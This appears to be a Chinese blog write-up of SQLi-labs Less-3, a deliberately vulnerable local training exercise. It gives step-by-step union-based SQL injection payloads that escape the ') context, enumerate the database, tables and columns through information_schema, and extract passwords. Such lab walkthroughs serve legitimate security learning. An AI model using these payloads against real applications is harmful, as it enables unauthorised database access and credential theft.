Sqli-labs 3

hacker_17Z2024-07-11 23:44

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
奇迹气泡1 分钟前
数据库基本建表操作
数据库
RisingWave中文开源社区2 小时前
经验分享|用开源产品构建一个高性能实时推荐引擎
数据库·后端·开源
小小工匠3 小时前
OpenSource - Apache POI 的 Word 模板引擎 poi-tl
开源·word·apache·poi-tl
功德+n3 小时前
Apache Log4j 2
java·开发语言·log4j·maven·apache
jay丿3 小时前
Django 初始化导入数据详解
数据库·django·sqlite
CodeJourney.3 小时前
用DEEPSEEK做数据看板:高效、实用与创新的融合
数据库·人工智能·python·算法
xuanloyer3 小时前
第二篇《Active Data Guard 实战:打造高可用数据库》(ADG)
运维·数据库·oracle
小王不会写code4 小时前
Unknown collation: ‘utf8mb4_0900_ai_ci‘
数据库·mysql
局外人LZ5 小时前
windows安装Neo4j图数据库
数据库·windows·neo4j
AaronZZH5 小时前
Neo4j 数据库备份
数据库·neo4j
热门推荐
01如何在WPS和Word/Excel中直接使用DeepSeek功能02DeepSeek各版本说明与优缺点分析03本地部署DeepSeek教程(Mac版本)04从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑05Windows 11 安装 Dify 完整指南 非docker环境06DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具07本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程08如何本地部署AI智能体平台,带你手搓一个AI Agent09保姆级教程:利用Ollama与Open-WebUI本地部署 DeedSeek-R1大模型10DeepSeek RAGFlow构建本地知识库系统